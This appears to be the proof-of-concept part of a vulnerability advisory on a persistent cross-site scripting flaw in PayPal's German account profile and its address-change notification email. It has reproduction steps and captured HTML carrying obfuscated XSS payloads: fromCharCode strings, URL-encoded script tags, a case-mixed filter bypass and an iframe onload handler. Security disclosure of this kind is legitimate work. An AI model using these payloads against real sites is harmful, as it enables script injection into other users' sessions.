Proof of Concept:
=================
The vulnerability can be exploited by remote attackers with Customer/Pro/Seller Account & low required user inter action.
For demonstration or reproduce ...


Review: User Profile - Geschäftsinhaber - User Profil (Mein Konto) Listing (Script Code Execution)

<div class="details">
<span>"><[>INJECTED PERSISTENT SCRIPT CODE AS COMPANY NAME!<])' <<="" span="">
<div class="small secondary">Unternehmenstyp, URL und mehr 
bearbeiten...</div>
</div>	


Review: Adresse Profil -  Listing  (Script Code Execution)

<div id="messageBox"></div><div id="main"><div class="layout1"><div class="datatable"><table id="viewtable" summary="street addresses" 
cellspacing="0"><colgroup><col width="35%"><col width="25%"><col width="*"></colgroup><thead><tr><th>Adresse</th><th>Zugehörige Kreditkarten
</th><th>Status</th></tr></thead><tbody><form method="post" action="https://www.paypal.com/de/cgi-bin/webscr?cmd=_profile-address-submit&
dispatch=5885d80a13c0db1f8e263663d3faee8d8494db9703d295b4a2116480ee01a05c" class=""></form><tr><td><input name="return" value="" type="hidden">
<input name="address_id" value="Qf3ntYQLgs25E1DBKd3un5JfZvip1l3kwgj2iBMne1UpaAD8yEcic32OZN0" type="hidden"><input name="card_count" value="0" 
type="hidden"><span class="emphasis">"><[>INJECTED PERSISTENT SCRIPT CODE AS COMPANY NAME!<])' <<br="">



PoC: Mail Security Notification (Sie haben Ihre Adresse geändert)

Manually Reproduce ...
1. Create an account with script code as companyname input field
2. Switch after registration with the account to the Mein Konto > Mein Profil > Addresse hinzufügen oder Bearbeiten module
3. Click the delete/entfernen button of the account with the script code as companyname
4. A mail got send normally with the following context ...

Sie haben Ihre Adresse geändert
 
Guten Tag, Evolution Security!       // Companyname (Evolution Security)
Wir möchten nur kurz bestätigen, ...

5. After the inject the get parsed in all instances of the application since it will be automatic used by the mail notification
6. The mail notification (security reason) only parse the address values and details context
7. The companyname is outside of the parsed generated template context, which results in the persistent execution of the malicious script code (js|html)
8. Reproduced ...

Sie haben Ihre Adresse geändert</span></h2></td></tr></tbody></table>
<p>Guten Tag, >"<[>INJECTED PERSISTENT SCRIPT CODE AS COMPANY NAME!<]>!</p>Wir möchten nur kurz bestätigen, dass Sie eine Adresse in Ihrem 
PayPal-Konto geändert haben.<h3>Hier die Details:</h3>
<!--[if gte mso 9]><style>.simpleSummaryTable {cell-spacing:5px !important; font:0.75em Verdana, Arial, Helvetica, sans-serif 
!important;}</style><![endif]-->


Review: Mail Security Notification (Sie haben Ihre Adresse geändert)

<tbody><tr valign="top"><td colspan="3"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr valign="top"><td><a 
href="https://www.paypal.com/de"><img src="http://images.paypal.com/en_US/i/logo/logo_emailheader_113wx46h.gif" alt="PayPal" border="0">
</a></td></tr><tr><td><img alt="" src="http://images.paypal.com/en_US/i/scr/pixel.gif" border="0" height="10" width="1"></td></tr><tr><td>
</td></tr></tbody></table></td></tr><tr><td colspan="3"><img src="http://images.paypal.com/en_US/i/scr/
scr_emailTopCorners_580wx13h.gif" style="vertical-align: bottom;" alt="" border="0" height="13"></td></tr><tr><td style="background: 
url("/i/scr/scr_emailLeftBorder_13wx1h.gif") repeat-y scroll left center transparent; border-left: 1px solid rgb(221, 221, 221);" 
width="12"><img src="http://images.paypal.com/en_US/i/scr/pixel.gif" alt="" border="0"></td><td class="contentArea" style="width: 530px; 
word-wrap: break-word; padding: 12px; margin: 0px;" width="530"><table style="" width="100%"><tbody><tr><td><h2><span style="font-weight: 
bold; color: rgb(200, 128, 57); font-size: 15px;" class="outlookFix">Sie haben Ihre Adresse geändert</span></h2></td></tr></tbody></table>
<p>Guten Tag, >"<[>INJECTED PERSISTENT SCRIPT CODE AS COMPANY NAME!<]>!</p>Wir möchten nur kurz bestätigen, dass Sie eine Adresse in Ihrem 
PayPal-Konto geändert haben.<h3>Hier die Details:</h3>
<!--[if gte mso 9]><style>.simpleSummaryTable {cell-spacing:5px !important; font:0.75em Verdana, Arial, Helvetica, sans-serif 
!important;}</style><![endif]-->
<table border="0" cellpadding="5" cellspacing="0" class="simpleSummaryTable" style="font:1em Verdana, Arial, Helvetica, sans-serif; 
border:1px solid #eee;margin-top:10px;border-right:0;margin-bottom:20px;" width="100%"><tr><th style="background-color:#eee; 
text-align:right; font-weight:normal; color:#333; margin:0px" width="180">Name:</th><td style="color:#333;" width="350">Evolution 
Security</td></tr><tr><th style="background-color:#eee; text-align:right; font-weight:normal; color:#333; margin:0px" 
width="180">Adresse:</th><td style="color:#333;" width="350">s<br/><html><body> <
button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108, 101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,
105,112,116,105,1 10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr om.Char.Code</button&
gt;</body></html> %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67
%32%22%29%3C%2F %73%63%72%69%70%74%3E  >"<ScriPt>ALeRt("xssOBFSbypass")</scriPt>
"><iframe src=a onload=alert("HI") <<br/>-1' <html><body> <
button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108, 101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,1
14,105,112,116,105,1 10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));"
> String:fr om.Char.Code</button></body></html>  %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43
%72%6F %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F %73%63%72%69%70%74%3E  >"<ScriPt>ALeRt("xssOBFSbypass")&
lt;/scriPt>  "><iframe src=a onload=alert("HI") <<br/>Deutschland<br/></td></tr></table>
<p>Wenn Sie Ihre Kreditkarte bei dieser Adresse registrieren oder die Adresse als Standardadresse angeben möchten, loggen Sie sich in 
Ihr PayPal-Konto ein, und klicken Sie auf "Mein Profil".</p>Wenn Sie diese Änderung nicht vorgenommen haben, <a href="
https://www.paypal.com/de/cgi-bin/helpscr?cmd=_help&t=escalateTab">lassen Sie es uns umgehend wissen</a>. Es ist wichtig, uns 
Bescheid zu geben, damit wir sicherstellen können, dass niemand ohne Ihr Wissen auf Ihr Konto zugreift.<p>Viele Grüße<br/>Ihr Team 
von PayPal</p></td><td width="12" style="background:url(/i/scr/scr_emailRightBorder_13wx1h.gif) left repeat-y;border-right:1px solid #ddd;
"><img src="http://images.paypal.com/en_US/i/scr/pixel.gif" border="0" alt=""/></td></tr><tr><td colspan="3">
<img height="13" src="http://images.paypal.com/en_US/i/scr/scr_emailBottomCorners_580wx13h.gif" border="0" alt=""/></td></tr>
</table><table border="0" cellpadding="0" cellspacing="0" id="emailFooter" style="padding-top:20px;font:10px Verdana, Arial, Helvetica, 
sans-serif;color:#333;" width="580"><tr><td><div class="footerLinks" style="margin: 5px 0; padding: 0;"><a target="_new" 
href="https://www.paypal.com/de/cgi-bin/helpweb?cmd=_help">Hilfe-Center</a><span style="color:#ccc;"> | </span><a 
target="_new" href="https://www.paypal.com/de/security">Sicherheits-Center</a></div><p>Bitte antworten Sie nicht auf diese 
E-Mail. E-Mails an diese Adresse werden von uns nicht gelesen. Um mit einem Mitarbeiter unseres Kundenservice zu sprechen, loggen Sie sich in Ihr 
PayPal-Konto ein und klicken Sie unten auf "Kontakt".</p><p>Copyright © 2012 PayPal. Alle Rechte vorbehalten.<br/><br/>PayPal 
(Europe) S.à r.l.et Cie, S.C.A.<br/>Société en Commandite par Actions<br/>Sitz: 22-24 Boulevard Royal, L-2449 Luxemburg<br/>RCS 
Luxemburg B 118 349</p><img height="1" width="1" src="https://102.112.2O7.net/b/ss/paypalglobal/1/G.4--NS/123456?pageName=system_email_PP006" 
border="0" alt=""/><p class="xptFooter ppid">PayPal-E-Mail-ID PP006</p></td></tr></table></div></body>
</html>
</body>
</html>
</iframe></p></td></tr></tbody>